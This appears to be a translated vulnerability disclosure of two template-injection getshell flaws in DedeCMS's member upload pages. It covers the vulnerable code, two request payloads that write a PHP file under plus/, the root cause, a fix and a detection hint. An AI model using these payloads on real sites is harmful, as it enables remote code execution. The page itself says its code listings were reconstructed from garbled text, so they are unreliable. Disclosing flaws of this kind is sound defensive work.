Getshell

Note on the excerpts: the code on this page was damaged by machine translation (stray spaces, `==` and `&&` collapsed, parentheses dropped, the `$cfg_` prefix rendered as `$pai_` or `$export_`). The listings below are reconstructed and should be checked against the DedeCMS source. The two request values are reproduced exactly as printed.

1. member/soft_add.php, line 156 (with gpc, i.e. magic_quotes_gpc, off)

```
156 if ($softurl1 != '')
157 {
158     $urls .= "{dede:link islocal='1' text='{$servermsg1}'} $softurl1 {/dede:link}\r\n";
159 }
```

Here `$servermsg1` is appended to `$urls` without any filtering. Constructing `$servermsg1` as

```
'} x {/dede: link} {dede: yy520 name \ = "'] = 0; fputs (fopen ('2. php ', 'w'), 'justforfun'); // "} yy520 {/dede: yy520}
```

results in a file 2.php being written under plus/, i.e. a getshell.

2. member/album_add.php, line 92

```
92  if ($formhtml == 1)
93  {
94      $imagebody = stripslashes($imagebody); // author's note: gpc is ignored here; applies when $cfg_mb_rmdown is N
95      $imgurls .= GetCurContentAlbum($imagebody, $copysource, $litpicname);
96      if ($ddisfirst == 1 && $litpic == '' && !empty($litpicname))
97      {
98          $litpic = $litpicname;
99          $hasone = true;
100     }
101 }
102 $info = '';
```

Execution then enters GetCurContentAlbum:

```
    function GetCurContentAlbum($body, $rfurl, &$firstdd)
28  {
29      global $cfg_multi_site, $cfg_basehost, $ddmaxwidth, $cfg_basedir, $pagestyle, $cfg_mb_rmdown, $title, $cfg_ml, $cfg_user_dir;
30      include_once(DEDEINC."/dedecollection.func.php");
31      if (empty($ddmaxwidth)) $ddmaxwidth = 240;
32      $rsimg = '';
33      $basehost = "http://".$_SERVER["HTTP_HOST"];
34      $img_array = array();
35      preg_match_all("/(src|SRC)=[\"|'| ]{0,}(http:\/\/([^>]*)\.(gif|jpg|png))/isU", $body, $img_array);
36      $img_array = array_unique($img_array[2]);
37      $imgUrl = $cfg_user_dir."/".$cfg_ml->M_ID;
38      $imgPath = $cfg_basedir.$imgUrl;
39      if (!is_dir($imgPath."/"))
40      {
41          MkdirAll($imgPath, $GLOBALS['cfg_dir_purview']);
42          CloseFtp();
43      }
44      $milliSecond = MyDate("ymdHis", time());
45      foreach ($img_array as $key => $value)
46      {
47          if (preg_match("#".$basehost."#i", $value))
48          {
49              continue;
50          }
51          if ($cfg_basehost != $basehost && preg_match("#".$cfg_basehost."#i", $value))
52          {
53              continue;
54          }
55          if (!preg_match("#^http:\/\/#i", $value))
56          {
57              continue;
58          }
59          if ($cfg_mb_rmdown == 'Y') {...........}
93          else
94          {
95              $rsimg .= "{dede:img ddimg='$value' text='' width='0' height='0'} $value {/dede:img}\r\n";
96          }
97      }
98      return $rsimg;
99  }
```

Construct `formhtml` as 1 and `imagebody` as

```
src = http: // {/dede: img} {dede: yy520 name \ = "'] = 0; fputs (fopen ('2. php ', 'w'), 'justforfun'); // "} yy520 {/dede: yy5202.16.jpg
```

Root cause in both cases: request-controlled text is concatenated into `{dede:...}` template markup without neutralising the tag delimiters, so a value can close the intended tag and open one of its own. The URL pattern on line 35 accepts any character other than `>` between `http://` and the image extension, braces included. A fix has to validate or escape these values at the point of concatenation (reject `{`, `}` and `dede:` in `$servermsg1` and in every extracted image URL) rather than rely on gpc. When checking whether a site was affected, the artifact to look for is an unexpected .php file under plus/.